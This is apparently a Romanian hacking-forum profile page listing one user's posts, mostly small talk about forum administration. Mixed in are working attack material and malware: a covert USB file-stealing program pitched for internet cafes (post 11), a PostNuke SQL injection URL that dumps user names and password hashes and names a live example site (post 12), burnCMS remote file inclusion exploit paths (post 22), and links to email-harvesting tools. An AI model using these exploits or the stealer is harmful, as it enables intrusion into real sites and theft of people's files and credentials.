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Everything posted by kw3rln

  1. http://video.google.nl/videoplay?docid=7728950276563555759
  2. astazi am ajuns in blankenberge [belgia] ! ma gasiti la hotelu aazaert
  3. kw3rln


  4. foarte interesante ! supunem la vot?
  5. kw3rln

    Bani pe net :D

    edededi nu cred ca vrei avertizare nu? ti-am scos odata referu ! l-am pus iara .. acuma il scot again
  6. da .. trebuie sa bagam ranguri ! care vine cu niste idei?
  7. 10x ! presupun ca e asta nou
  8. nuuu tu esti om destept si de treaba io vorbeam de aia prosti de pe 3xforum [care nici un forum nu stiu instala] si altii
  9. Bravo Slick ! foarte folositor
  10. ati vazut unii ca pe RST la unele posturi apareau alert XSS ! Problema ii cand am convertit de la php-fusion la phpbb si a ramas in baza de date <script>alert('XSS')</script> [ phpbb interpretand <script> ca tag html desi html ii inchis pe acest forum ] aestia tonti care au sarit din gradina domnului direct la gatul meu sint idioti cronici dupa a mea parere umila din moment ce se chinuie atit sa ma darime, anihileze, stearga ... pentru a ne lamuri ca ei sint si mai si. nici macar nau eleganta , spirit si inteligenta Am pregatit o poezie pentru cei cu XSS-u: Tu hecãr anonim si prost O zanã bunã de-as fi fost Ti as fi dat casa si mertzan Si nishte minte in bostan Iar de-as fi fost o zanã rea Te as fi facut insecta mea A stai ! Tu o insecta esti Esti bun de a runcat la pesti S- am inc
  11. *** The Thief 1.0 *** This program is a real Thief, Just run it and create this folder manually C:\system\error\ then plug any USB drive, your flash disk or camera... it will copy all the files that are in the USB drives, on your computer without any notification without making your computer slower. You can see the copied folder under the folder u created C:\system\error If you have an internet cafe u can install it there and make it run at startup and u can get all the data of the USB drives. And it's me who made the program so Please tell me what u think of it? If you need to buy the source code or donate please contact me. or if u want to make it save under another folder please contact me at my msn messenger: met055@msn.com . http://rapidshare.com/files/28374053/The_Thief.rar no password enjoy
  12. ============================================================ PostNuke pnFlashGames Module v1.5 REmote SQL Injection ============================================================ Bulan: xoron xoron.biz + Love's the funeral of hearts The funeral of hearts And a plea for mercy When love is a gun Separating me from you ============================================================ Exploit: index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/* ============================================================ Example: http://andersonvision.com/PostNuke/ ============================================================ # milw0rm.com [2007-04-28]
  13. nice ! 10x .. o sa-l pun pe pagina principala cand e gata
  14. http://rapidshare.com/files/28308262/EmailListMaster_Setup.rar
  15. http://rapidshare.com/files/28307964/Email_Spider.rar
  16. bah tu nu esti normal ))))
  17. la folder_big ar merge parca mai colorat [tot asa cum o aratat]! mai bine schimbi Folder NEW fain efect o prins de la cellpic
  18. bannerul acesta o sa-l folosim si pe pagina principala ! sysghost mi-o promis in 2 zile ca termina cms-ul
  19. un proiect fainutz facut de ironfist http://wordlist.ironwarez.info/
  20. eu zic ca nu trebe 100% ca arata bine si asa ...
  21. http://files.filefront.com/vx_0084azip/;7340472;/fileinfo.html
  22. # burnCMS <= 0.2(root)Remote File Include Vulnerablities # D.Script: http://www.burnstone.ch/downloads/burnCMS-0.2.zip # Discovered by: GolD_M = [Mahmood_ali] # Homepage: http://www.Tryag.cc # Exploit:[Path_burnCMS]/lib/authuser.php?root=Shell # Exploit:[Path_burnCMS]/lib/misc.php?root=Shell # Exploit:[Path_burnCMS]/lib/connect.php?root=Shell # Exploit:[Path_burnCMS]/lib/db/mysql.class.php?root=Shell # Exploit:[Path_burnCMS]/lib/db/postgres.class.php?root=Shell # Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & cRiMiNaL NeT
  23. Bravo encoded ! felicitarile mele
  24. penal rau pfoai cat am putut rade
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